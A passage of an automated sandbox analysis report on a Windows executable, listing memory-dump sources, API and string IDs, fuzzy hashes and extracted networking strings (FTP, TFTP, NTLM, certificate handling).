                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2936579111-0
                    • Opcode ID: 16d080daddb4de49fdbf25b5749fe77e2b5603bb03e0ba422942d5b6370a4db6
                    • Instruction ID: 1b50b7c2888c84c2d56d0f7c9cd982912173982a50e89132caa59f6f57e61595
                    • Opcode Fuzzy Hash: 16d080daddb4de49fdbf25b5749fe77e2b5603bb03e0ba422942d5b6370a4db6
                    • Instruction Fuzzy Hash: 65617D21B09B4187FB10BB61D4401BDA3A1AF45BA4F850579DE2E17BD9CFBDE44583E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %lld$%s%c%s%c$TFTP buffer too small for options$TFTP filename too long$blksize$timeout$tsize
                    • API String ID: 0-1082497253
                    • Opcode ID: 2dd4c3d86f24cc8d94e20a1282731ef7ff7c5b550ef04e245770f3f6e0de58e0
                    • Instruction ID: 51599747f50c9a9e85e90f4596c165fea646a966d1c69597b387654f702c19c9
                    • Opcode Fuzzy Hash: 2dd4c3d86f24cc8d94e20a1282731ef7ff7c5b550ef04e245770f3f6e0de58e0
                    • Instruction Fuzzy Hash: A8E18FA2B08AC286EB10DF54D4403B9F7A1EB85B88F898136CA6D877D5DFBCD545C360
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: ???$FTP response aborted due to select/poll error: %d$FTP response timeout$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
                    • API String ID: 1452528299-2707140833
                    • Opcode ID: 9365f5d093863395c4febbb40364748f3b4be129e8fac596ae922e07d2770973
                    • Instruction ID: dfa623762d5c99007fddcb4eebfaaf6cfc5489228507b8d2f7358ce115dfe5dd
                    • Opcode Fuzzy Hash: 9365f5d093863395c4febbb40364748f3b4be129e8fac596ae922e07d2770973
                    • Instruction Fuzzy Hash: A8619022B0878286EB54BB96D8102B9A790AF867A4FC44135DD7D873D5EFBCE44583A0
                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3C94
                    • GetProcAddress.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3CB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                    • API String ID: 1646373207-3327535076
                    • Opcode ID: 023bb16efbd3f086ade453e5794a8645d8237b78f16ca98ff3619fe335ae2783
                    • Instruction ID: e3698a8c9312d3cbb69ba2a69fc2131e2dfc8bf88dbeef4f35f4c7185e9d89cf
                    • Opcode Fuzzy Hash: 023bb16efbd3f086ade453e5794a8645d8237b78f16ca98ff3619fe335ae2783
                    • Instruction Fuzzy Hash: 7441D612B09A4682FB55EF5AA540135AB91AF8AFD4F8C8134CE2D433D4DFBCE485C364
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=_vfwprintf_l
                    • String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$GMT$Signature
                    • API String ID: 2063679162-2552702830
                    • Opcode ID: af0a308eb33c86821f81bb7ed10213ac9d13e3ab6c0b510df5bb56387812e107
                    • Instruction ID: 9d8db8309bcc7323427558ca2d2e362045b1cc2b239a2bc0dc516562354031b1
                    • Opcode Fuzzy Hash: af0a308eb33c86821f81bb7ed10213ac9d13e3ab6c0b510df5bb56387812e107
                    • Instruction Fuzzy Hash: 31518362B0C68782EB10AFA5D4901B9E7A1FF44794FC40032DA6D8B6C9DFBCE505C3A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$%02x:$%s%x$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 1392487457-4134566305
                    • Opcode ID: 82c9a304a55d7ea7e905cff5378cf69a3c52388fc5dcd46fc02fd83b2b9662a5
                    • Instruction ID: 0ece28826f370dc5b8974a45120b9a6eb014e41d8434c632906d0c0086a2101b
                    • Opcode Fuzzy Hash: 82c9a304a55d7ea7e905cff5378cf69a3c52388fc5dcd46fc02fd83b2b9662a5
                    • Instruction Fuzzy Hash: 35516421B0C68796EB10ABA5D4902BDA751FF44794FC40032DA7DDB6C9EFACE505C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature$TRUE
                    • API String ID: 1392487457-2967394984
                    • Opcode ID: d40dc6caf98b1959f239ecbeebf660d59fe11d6a7f388a3240a9f58c4a69ed16
                    • Instruction ID: 7233455b19662ac539af234ec2ebdeec03f3dbb19320322fa92ca3a5762b25dd
                    • Opcode Fuzzy Hash: d40dc6caf98b1959f239ecbeebf660d59fe11d6a7f388a3240a9f58c4a69ed16
                    • Instruction Fuzzy Hash: D6413522B0868796EB10ABA5D4941BAA761FF44794FC00031D92D9B6D9DFBCE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 849930591-393685449
                    • Opcode ID: 40e7a1d984637f1b15e62fc4eb181154e2c5237c6989c010dd7a3fa2b4aa81b6
                    • Instruction ID: ab619e85c0dc855d005c1d0f01377f4f6386fc161b9066f3c5cd7f946c20406d
                    • Opcode Fuzzy Hash: 40e7a1d984637f1b15e62fc4eb181154e2c5237c6989c010dd7a3fa2b4aa81b6
                    • Instruction Fuzzy Hash: C0D19132A0878187EB24EB6594403ADB7A0FF45788F900139EEAD57BDACF79E141C790
                    APIs
                    Strings
                    • M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F12FD929
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$CompareInfoString
                    • String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
                    • API String ID: 2984826149-2797344925
                    • Opcode ID: 07441517bed317fe36ebe1df40869ff7a7dcdc8802cd1942ef5b058da9a8c6cd
                    • Instruction ID: 8dbd9cad42af10ee3d6c90ac14a81b82d866058408ce90f86eb463a2b370ef3e
                    • Opcode Fuzzy Hash: 07441517bed317fe36ebe1df40869ff7a7dcdc8802cd1942ef5b058da9a8c6cd
                    • Instruction Fuzzy Hash: 32A1C562B0C68A46EB21AFA08454379A791EF40BA8FC44635DA7D877C4DFBCE44493E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: ;type=$;type=%c$?%s$ftp$http
                    • API String ID: 356670603-3547414
                    • Opcode ID: abe16133e0f2bab088ce8032117a6559f298c416f493daf04005beefbf736e50
                    • Instruction ID: a0cee246bc510e4358909bed810e1e8ea50cc81b975294824a7ac3aaac4e9065
                    • Opcode Fuzzy Hash: abe16133e0f2bab088ce8032117a6559f298c416f493daf04005beefbf736e50
                    • Instruction Fuzzy Hash: CC51D125B0868341FB14B7A6A4503FA9690AF45B90F884035DF6DC77D2EFAEE801C3A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 1392487457-2144801519
                    • Opcode ID: b6e9fbae42d31899ea9514cf5f310ddaad571242618a51ac496a56b80f278b1f
                    • Instruction ID: e9603261827fb4e4f272cb0b5182576a72d7eb76e4212794e1565b4482dcd289
                    • Opcode Fuzzy Hash: b6e9fbae42d31899ea9514cf5f310ddaad571242618a51ac496a56b80f278b1f
                    • Instruction Fuzzy Hash: 6A415421B0C64792FB10ABA5D4941BEE751FF44794FC00031DA2D9B6D9EFACE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=_vfwprintf_l
                    • String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 2063679162-2144801519
                    • Opcode ID: cd5bc3cb97de8a2aaf571fcf7292bf6f5bee2736c1531b2368bc66c047e5b848
                    • Instruction ID: 4445a11a80d12fecc43363e6706732cfbbb89fda5058c6bd3f7bf3a3a35f4c68
                    • Opcode Fuzzy Hash: cd5bc3cb97de8a2aaf571fcf7292bf6f5bee2736c1531b2368bc66c047e5b848
                    • Instruction Fuzzy Hash: A0414521B0C68792EB10ABA5D4941BAE751FF44794FC00031DA2D9B6D9EFACE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: f$p$p
                    • API String ID: 3215553584-1995029353
                    • Opcode ID: d422bfe28a17b75aa9da2920a17567928dc802ef632086f76624d76a6e029c17
                    • Instruction ID: 6a5481fded68797ddc89f70fdbf1b54d4571294f376a366938b54c254c5b3ff7
                    • Opcode Fuzzy Hash: d422bfe28a17b75aa9da2920a17567928dc802ef632086f76624d76a6e029c17
                    • Instruction Fuzzy Hash: D612C421A0C24387FB24BA14D15467AF3D1FF90758FD9403DE6AA47AC4DBBDE5808BA0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _vfwprintf_l
                    • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                    • API String ID: 1692953108-3948863929
                    • Opcode ID: 25e80bbd132b583b1b48b4671cc279ba6715ef5a3f42b0496f6bfab709eb7789
                    • Instruction ID: fc0635f14da13b9f21a7d1d8c440ed5089bd17cadaa916a7ac363de8428c7a77
                    • Opcode Fuzzy Hash: 25e80bbd132b583b1b48b4671cc279ba6715ef5a3f42b0496f6bfab709eb7789
                    • Instruction Fuzzy Hash: 01816432708B8682EB20EB55E4547AEB7A0FB85794F800036EB9D87795DF7DD504CB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 2063679162-995577734
                    • Opcode ID: 80b32c139fe1997281bc2532d75e550a081ac61f7f90c25277eca46600cb2585
                    • Instruction ID: 6e43b6d2b4dfc2e44372ad89ccc4437d6cc76d7f342b84d03e556e15ae2f12ab
                    • Opcode Fuzzy Hash: 80b32c139fe1997281bc2532d75e550a081ac61f7f90c25277eca46600cb2585
                    • Instruction Fuzzy Hash: 6351D521B0869342FB24BAA5D4942F9A791EF54794F800036DA7ECB5CADFACE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: (none)$Host %s:%d was resolved.$IPv4: %s$IPv6: %s$too many IP, cannot show
                    • API String ID: 356670603-234134439
                    • Opcode ID: 8153fc1339c05b4a31981d61cdd86d221e8d9555c1a8d952db300991616d2cf9
                    • Instruction ID: 12e0279f6f75498f3cd190b68d3f17c9f1dbfe35cb5a470f369f94348e7bd632
                    • Opcode Fuzzy Hash: 8153fc1339c05b4a31981d61cdd86d221e8d9555c1a8d952db300991616d2cf9
                    • Instruction Fuzzy Hash: 34519165B1868282FB64FB99D4103BAA750FF84790FC44032DA6DC76C6DFACE505C7A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1531918476-0
                    • Opcode ID: bdb4a8179d91b893c9809a5adfcef09e127626f7e6f9d959f141b95edb0eab16
                    • Instruction ID: b7a9e3eb1fc6c3ae1760f3d49ca82625355c099b9c8862d3023df7b95e8a5fc4
                    • Opcode Fuzzy Hash: bdb4a8179d91b893c9809a5adfcef09e127626f7e6f9d959f141b95edb0eab16
                    • Instruction Fuzzy Hash: F951F462B0968681EB04ABA5D540379E360FF44BE0F984236DA7DC7AD5DFFCE44183A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 2063679162-995577734
                    • Opcode ID: b91238858ae0f21e4d4636808c12ccab0168ddea0a8873b11eedc77232b8cae9
                    • Instruction ID: 2ddd24fa08acfb3b59ffaeceeb3a347682138c4e6396ee0203d9ae2bcb447e85
                    • Opcode Fuzzy Hash: b91238858ae0f21e4d4636808c12ccab0168ddea0a8873b11eedc77232b8cae9
                    • Instruction Fuzzy Hash: 26415321B0864742FB10ABA5D4942BA9791FF44794FC00031DA2DDB6C9EFBCE945C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 2063679162-995577734
                    • Opcode ID: 6b78cb315f5494224271437fbcc5eb7bda9dde55d497bbac7faf9c510f05d277
                    • Instruction ID: 978e79ab9b39b4b4aa995f34ab6cce89c72db837cdd1a772f9e78235521975da
                    • Opcode Fuzzy Hash: 6b78cb315f5494224271437fbcc5eb7bda9dde55d497bbac7faf9c510f05d277
                    • Instruction Fuzzy Hash: AA415562B0868786EB10ABA5D4942FEA751FF44794FC00031DE2D976CADFBCE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 1392487457-995577734
                    • Opcode ID: 318670d4d47cb91031d490821861550af3f2e64b498bea5c7308063491d09d0c
                    • Instruction ID: 289b7a8e8de768a5b6fa3368f270eb5175f8c2f47f1bb631392c3fdb5f0e9821
                    • Opcode Fuzzy Hash: 318670d4d47cb91031d490821861550af3f2e64b498bea5c7308063491d09d0c
                    • Instruction Fuzzy Hash: D9413522B0868792EB10ABE5D4941FAA751FF54794FC00031DA2D976CADFBCE545C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=$_vfwprintf_l
                    • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                    • API String ID: 1392487457-995577734
                    • Opcode ID: 7e2a670cbc3751083aca8d844e7b0d524f3d7b7a038902c5b21e05b7bc75484a
                    • Instruction ID: 3789626d7cf4ebfe91d060fe65e38879a57150ffef108e22b36abeac8a2ccb91
